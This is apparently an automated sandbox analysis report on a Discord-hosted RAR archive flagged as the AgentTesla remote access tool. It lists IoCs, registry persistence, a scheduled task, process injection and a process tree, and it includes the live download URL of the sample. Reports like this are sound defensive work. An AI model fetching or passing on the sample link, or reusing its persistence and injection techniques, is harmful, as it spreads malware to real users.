Analysis

max time kernel: 60s
max time network: 63s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-06-2024 15:19

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&
Resource: win10v2004-20240426-en

General

Target: https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | process | target process
  PID 5692 created 616 | 5692 | powershell.EXE | winlogon.exe
AgentTesla payload (2 IoCs)
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll | family_agenttesla
  behavioral1/memory/5136-187-0x0000000008AC0000-0x0000000008CD4000-memory.dmp | family_agenttesla
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | $77Boy.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | XerinFuscatorFucker.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | XerinJunk.exe
Executes dropped EXE (8 IoCs)
  pid | process
  2204 | XerinFuscatorFucker.exe
  5136 | XerinFuscatorFucker.exe
  5284 | XerinJunk.exe
  5564 | $77Boy.exe
  5628 | Install.exe
  5696 | XerinFuscator.exe
  3212 | XerinFuscator.exe
  5896 | $77Boy.exe
Loads dropped DLL (20 IoCs)
  pid | process
  5136 | XerinFuscatorFucker.exe (12 entries)
  5696 | XerinFuscator.exe (4 entries)
  3212 | XerinFuscator.exe (4 entries)
Obfuscated with Agile.Net obfuscator (6 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
  resource | yara_rule
  C:\Users\Admin\Videos\Xerin\XerinFuscator.exe | agile_net
  behavioral1/memory/5136-148-0x0000000007C20000-0x00000000080EE000-memory.dmp | agile_net
  C:\Users\Admin\AppData\Local\Temp\40585F64.dll | agile_net
  behavioral1/memory/5136-996-0x000000000B2A0000-0x000000000B3E2000-memory.dmp | agile_net
  behavioral1/memory/5696-1042-0x0000000000890000-0x0000000000D5E000-memory.dmp | agile_net
  behavioral1/memory/3212-1066-0x0000000000F20000-0x00000000013EE000-memory.dmp | agile_net
Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Boy = "C:\\Users\\Admin\\AppData\\Roaming\\$77Boy.exe" | $77Boy.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
  flow | ioc
  44 | raw.githubusercontent.com
  45 | raw.githubusercontent.com
  48 | raw.githubusercontent.com
  49 | raw.githubusercontent.com
Drops file in System32 directory (5 IoCs)
  description | ioc | process
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\$77Boy | svchost.exe
Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 5692 set thread context of 5936 | 5692 | powershell.EXE | dllhost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry (2 TTPs, 12 IoCs)
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | XerinFuscator.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | XerinFuscatorFucker.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | XerinFuscator.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | XerinFuscator.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | XerinFuscator.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | XerinFuscator.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | XerinFuscator.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | XerinFuscatorFucker.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | XerinFuscatorFucker.exe
Modifies data under HKEY_USERS (41 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Modifies registry class (2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | msedge.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 | Explorer.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | process
  3360 | msedge.exe (2 entries)
  2668 | msedge.exe (2 entries)
  4668 | identity_helper.exe (2 entries)
  820 | msedge.exe (2 entries)
  5564 | $77Boy.exe (2 entries)
  5692 | powershell.EXE (4 entries)
  5936 | dllhost.exe (13 entries)
  5564 | $77Boy.exe (1 entry)
  5936 | dllhost.exe (31 entries)
  5696 | XerinFuscator.exe (1 entry)
  5936 | dllhost.exe (4 entries)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | process
  3372 | Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
  pid | process
  2668 | msedge.exe (7 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | process
  Token: SeRestorePrivilege | 2880 | 7zG.exe
  Token: 35 | 2880 | 7zG.exe
  Token: SeSecurityPrivilege | 2880 | 7zG.exe (2 entries)
  Token: SeDebugPrivilege | 5564 | $77Boy.exe
  Token: SeDebugPrivilege | 5136 | XerinFuscatorFucker.exe
  Token: SeDebugPrivilege | 5692 | powershell.EXE (2 entries)
  Token: SeDebugPrivilege | 5936 | dllhost.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege (alternating) | 3372 | Explorer.EXE (12 pairs, 24 entries)
  Token: SeDebugPrivilege | 5696 | XerinFuscator.exe
  Token: SeDebugPrivilege | 3212 | XerinFuscator.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege (alternating) | 3372 | Explorer.EXE (8 pairs, 16 entries)
  Token: SeAssignPrimaryTokenPrivilege | 2240 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 2240 | svchost.exe
  Token: SeSecurityPrivilege | 2240 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 2240 | svchost.exe
  Token: SeLoadDriverPrivilege | 2240 | svchost.exe
  Token: SeSystemtimePrivilege | 2240 | svchost.exe
  Token: SeBackupPrivilege | 2240 | svchost.exe
  Token: SeRestorePrivilege | 2240 | svchost.exe
  Token: SeShutdownPrivilege | 2240 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 2240 | svchost.exe
  Token: SeUndockPrivilege | 2240 | svchost.exe
  Token: SeManageVolumePrivilege | 2240 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 2240 | svchost.exe
Suspicious use of FindShellTrayWindow (38 IoCs)
  pid | process
  2668 | msedge.exe (35 entries)
  2880 | 7zG.exe
  5136 | XerinFuscatorFucker.exe (2 entries)
Suspicious use of SendNotifyMessage (24 IoCs)
  pid | process
  2668 | msedge.exe (24 entries)
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | process
  5136 | XerinFuscatorFucker.exe
  3372 | Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | process | target process
  PID 2668 wrote to memory of 2180 | 2668 | msedge.exe | msedge.exe (2 entries)
  PID 2668 wrote to memory of 4868 | 2668 | msedge.exe | msedge.exe (40 entries)
  PID 2668 wrote to memory of 3360 | 2668 | msedge.exe | msedge.exe (2 entries)
  PID 2668 wrote to memory of 3692 | 2668 | msedge.exe | msedge.exe (20 entries)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree depth in brackets)

[1] C:\Windows\system32\winlogon.exe
    cmd: winlogon.exe

[2] C:\Windows\system32\dwm.exe
    cmd: "dwm.exe"

[2] C:\Windows\System32\dllhost.exe
    cmd: C:\Windows\System32\dllhost.exe /Processid:{5e110e22-97c8-4a1b-ab10-df6d2988fb30}
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\lsass.exe
    cmd: C:\Windows\system32\lsass.exe

[1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

[1] C:\Windows\System32\svchost.exe
    cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

[1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

[1] C:\Windows\System32\svchost.exe
    cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

[1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

[1] C:\Windows\System32\svchost.exe
    cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory

[1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- Drops file in System32 directory

[2] C:\Windows\system32\taskhostw.exe
    cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<long obfuscated PowerShell command line, omitted>"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\$77Boy.exeC:\Users\Admin\AppData\Roaming\$77Boy.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\System32\spoolsv.exe
  cmd: C:\Windows\System32\spoolsv.exe
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- C:\Windows\sysmon.exe
  cmd: C:\Windows\sysmon.exe
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\wbem\unsecapp.exe
  cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1246679036214775850/1246841848383799467/Xerin.rar?ex=665ddb75&is=665c89f5&hm=e2648adbc695a1280ed7363d8ed05dcaf4ecff6a1482236197486c52e9a3b99f&
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffe344246f8,0x7ffe34424708,0x7ffe34424718
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4828 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,12717800052722755208,14402988799281570879,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  - C:\Program Files\7-Zip\7zG.exe
    cmd: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Videos\" -an -ai#7zMap10297:66:7zEvent28675
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
  - C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe
    cmd: "C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Enumerates system info in registry
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - C:\Windows\System32\Conhost.exe
        cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - C:\Users\Admin\AppData\Local\Temp\$77Boy.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\$77Boy.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - C:\Windows\System32\schtasks.exe
